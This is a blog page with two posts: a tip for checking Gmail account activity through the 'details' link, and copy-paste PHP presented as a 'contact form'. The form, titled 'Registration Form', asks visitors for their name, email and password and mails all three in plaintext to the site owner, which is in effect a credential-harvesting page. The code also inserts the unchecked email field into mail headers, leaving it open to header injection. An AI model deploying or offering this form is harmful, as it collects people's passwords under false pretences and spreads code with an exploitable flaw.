Showing posts with label email. Show all posts
Almost all the Internet users use Google, almost everyone has a Gmail Account.

That has nothing to do with tutorial but my point is this article is for gmail users.

You know when you logged in to your gmail and sometimes you forget to logout, meantime someone will access to your account maybe someone at your home. So you never know whether someone accessed your account unless you know this trick.


Some people do some serious stuff through email, like their business stuff. from this option you can know even if someone hacked in to your account.

Login to your gmail account >> and scroll all the way down and Lookup for an option called "details"

or if you can't find it click Ctrl+F and type details and press enter, the Browser will take you the word details on the page.

You can see all the details such as Time, IP address, Country and More details about your email activity.

Hope this helps!
Cheers!!!!
This form is a contact form, this Doesn't work on Blogspot blogs, because you have to use some php in this.
copy the code below and paste it on your website/page.
To add css you can add <style>tags  below the <html> tag
You have to change 'youremail@example.com' to your email, Because this is the email that you receive details.
.............................................................................................................................................................

<html>
<style>
Add your CSS Codes here
</style>
<h1>Registration Form</h1>
</html>
<?php
if ($_POST["email"]<>'') {
    $ToEmail = 'youremail@example.com';
    $EmailSubject = 'Site contact form';
    $mailheader = "From: ".$_POST["email"]."\r\n";
    $mailheader .= "Reply-To: ".$_POST["email"]."\r\n";
    $mailheader .= "Content-type: text/html; charset=iso-8859-1\r\n";
    $MESSAGE_BODY = "Name: ".$_POST["name"]."";
    $MESSAGE_BODY .= "Email: ".$_POST["email"]."";
    $MESSAGE_BODY .= "Password: ".$_POST["password"]."";
    mail($ToEmail, $EmailSubject, $MESSAGE_BODY, $mailheader) or die ("Failure");
?>
Your message was sent
<?php
} else {
?>
<form action="test.php" method="post">
<table width="400" border="0" cellspacing="2" cellpadding="0">
<tr>
<td width="29%" class="bodytext">Your name:</td>
<td width="71%"><input name="name" type="text" id="name" size="32"></td>
</tr>
<tr>
<td class="bodytext">Email address:</td>
<td><input name="email" type="text" id="email" size="32"></td>
</tr>
<tr>
<td class="bodytext">Password:</td>
<td><input name="password" type="password" id="password" ></td>
</tr>
<tr>
<td class="bodytext"> </td>
<td align="left" valign="top"><input type="submit" name="Submit" value="Send"></td>
</tr>
</table>
</form>
<?php
};
?>
.............................................................................................................................................................


NOTICE: If you anything wrong in this article comment on this Post

Thank You!
Premium Blogspot Templates
Copyright © 2013 Dragnov Entertainment and Hack Free Site